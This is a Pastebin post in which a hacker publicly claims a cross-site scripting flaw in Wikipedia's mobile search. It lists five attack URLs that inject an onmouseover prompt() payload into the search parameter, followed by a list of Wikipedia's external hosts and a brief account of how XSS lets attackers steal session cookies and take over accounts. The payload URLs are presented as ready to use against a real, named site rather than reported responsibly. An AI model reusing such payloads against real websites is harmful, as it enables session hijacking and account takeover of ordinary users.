Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wikipedia, the worlds largest 'biased' information portal is vulnerable to XSS or Cross Site Scripting attack. Following are the links through which the attack can be commenced.
- By
- ThEhAcKeR12
- Twitter: @ThEhAcKeR12
- http://en.wikipedia.org/w/index.php?search=%27%20onmouseover%3dprompt%28952154%29%20bad%3d%27&title=Special:Search&useformat=mobile
- http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=0&search=%27%20onmouseover%3dprompt%28955575%29%20bad%3d%27&title=Special:Search&useformat=mobile
- http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=1&search=%27%20onmouseover%3dprompt%28941380%29%20bad%3d%27&title=Special:Search&useformat=mobile
- http://en.wikipedia.org/w/index.php?fulltext=Search&redirs=0&search=%27%20onmouseover%3dprompt%28983464%29%20bad%3d%27&title=Special:Search&useformat=mobile
- http://en.wikipedia.org/w/index.php?advanced=1&fulltext=Search&ns0=1&ns1=1&ns10=1&ns100=1&ns101=1&ns108=1&ns109=1&ns11=1&ns12=1&ns13=1&ns14=1&ns15=1&ns2=1&ns3=1&ns4=1&ns5=1&ns6=1&ns7=1&ns8=1&ns9=1&redirs=1&search=%27%20onmouseover%3dprompt%28980283%29%20bad%3d%27&title=Special:Search&useformat=mobile
- Wikipedia's list of external hosts:
- creativecommons.org
- bits.wikimedia.org
- secure.wikimedia.org
- wikimediafoundation.org
- www.mediawiki.org
- geoiplookup.wikimedia.org
- upload.wikimedia.org
- www.freenode.net
- www.wikimediafoundation.org
- www.contactmusic.com
- www.belfasttelegraph.co.uk
- enjoyment.independent.co.uk
- archives.cnn.com
- blackstarnews.com
- www.polkonline.com
- www.askmen.com
- www.addictioninfo.org
- metromix.chicagotribune.com
- paralleluniverse.msn.com
- web.archive.org
- www.hollywoodreporter.com
- www.thewrap.com
- www.satansalley.com
- www.mediablvd.com
- news.yahoo.com
- www.cinemablend.com
- www.godisageek.com
- www.sfgate.com
- www.premiere.com
- people.aol.com
- www.people.com
- www.monk.com
- www.youtube.com
- www.imdb.com
- ar.wikipedia.org
- bg.wikipedia.org
- cs.wikipedia.org
- cy.wikipedia.org
- da.wikipedia.org
- de.wikipedia.org
- dv.wikipedia.org
- et.wikipedia.org
- el.wikipedia.org
- es.wikipedia.org
- fa.wikipedia.org
- fr.wikipedia.org
- hr.wikipedia.org
- id.wikipedia.org
- it.wikipedia.org
- he.wikipedia.org
- jv.wikipedia.org
- lv.wikipedia.org
- hu.wikipedia.org
- ms.wikipedia.org
- mn.wikipedia.org
- nl.wikipedia.org
- ja.wikipedia.org
- no.wikipedia.org
- pl.wikipedia.org
- pt.wikipedia.org
- ro.wikipedia.org
- ru.wikipedia.org
- sq.wikipedia.org
- simple.wikipedia.org
- sk.wikipedia.org
- sr.wikipedia.org
- fi.wikipedia.org
- sv.wikipedia.org
- tl.wikipedia.org
- th.wikipedia.org
- tr.wikipedia.org
- uk.wikipedia.org
- zh.wikipedia.org
- What is XSS or Cross Site Scripting - Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable link to fool a user in order to gather data from them. A Hacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement